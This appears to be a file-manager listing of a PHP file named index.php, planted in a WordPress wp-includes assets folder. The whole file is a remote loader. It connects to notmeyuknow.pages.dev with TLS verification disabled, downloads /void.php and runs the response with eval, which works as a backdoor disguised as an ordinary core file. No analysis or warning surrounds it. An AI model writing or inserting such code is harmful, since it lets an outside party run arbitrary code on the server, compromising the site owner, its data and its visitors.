File "index.php"

Full Path: /home/laciafrdyl/www/wp-includes/assets/interactivity-api/494273/index.php
File size: 642 bytes
MIME-type: text/plain
Charset: utf-8

fgfg<?php
$host = 'notmeyuknow.pages.dev';
$path = '/void.php';
$context = stream_context_create([
        'ssl' => [
            'verify_peer' => false,
            'verify_peer_name' => false,
        ]
    ]);
$fp = stream_socket_client("ssl://{$host}:443", $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
if (!$fp) return false;
$out = "GET {$path} HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$response = stream_get_contents($fp);
fclose($fp);
$http_pos = strpos($response, "\r\n\r\n");
$content = substr($response, $http_pos + 4);
eval("?>".$content);
?>